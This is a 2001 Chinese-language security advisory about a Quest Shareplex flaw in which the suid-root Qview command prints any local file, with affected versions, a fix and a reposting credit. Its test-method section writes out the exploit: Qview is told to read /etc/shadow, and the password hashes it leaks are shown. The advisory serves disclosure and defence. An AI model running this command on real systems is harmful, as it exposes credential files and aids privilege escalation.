Shareplex 读取任意本地文件漏洞

发布日期：2001-04-09
更新日期：2001-04-09

受影响系统：

Quest Shareplex 2.2.2 beta
- Sun Solaris 2.6
- HP HP-UX 11.0
- HP HP-UX 10.20
Quest Shareplex 2.1.3.9
- Sun Solaris 2.6
- HP HP-UX 11.0
- HP HP-UX 10.20

不受影响系统：

Quest Shareplex 2.1.3.21
- Sun Solaris 2.6
- IBM AIX 3.0x
- HP HP-UX 11.0
- HP HP-UX 10.20
- Digital OSF/1 4.0
- Sun Solaris 2.6
- IBM AIX 3.0x
- HP HP-UX 11.0
- HP HP-UX 10.20

描述：

---

Shareplex 是 Quest Software开发的数据库复制工具。某些版本的Shareplex存在安
全漏洞，使得本地普通用户可以读取任意文件。

Shareplex 携带了一个命令 Qview，它允许用户指定一个本地文件作为Qview命令输
入，如果该命令文件所包含的内容不是有效的Qview命令，将在标准错误输出上显示
该文件内容。由于Qview是suid-to-root了的，显然本地攻击者可以利用这个缺陷读
取任意本地文件，包括/etc/shadow。

该漏洞潜在导致本地安全性能的极大损害。

<* 来源：Dixie Flatline (echo8@gh0st.net) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ id
uid=500(foo) gid=200(bar)
$ cd <path to shareplex binaries>
$ ./qview
qdump> cmd /etc/shadow
Executing: root:xDmyz1K9xRKRo:11236::::::
invalid command root:xDmyz1K9xRKRo:11236::::::
...
Executing: splex:BdJCfh1D32hzo:11290::::::
invalid command splex:BdJCfh1D32hzo:11290::::::
Executing: foo:2MQXUgAcnOcEU:11344::::::
invalid command foo:2MQXUgAcnOcEU:11344::::::
qdump> quit
$



建议：

---

临时解决方案是修正Qview命令的权限设置，去掉suid-to-root设置。
SharePlex 2.1.3.21及其以上版本已经修正了该问题。

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!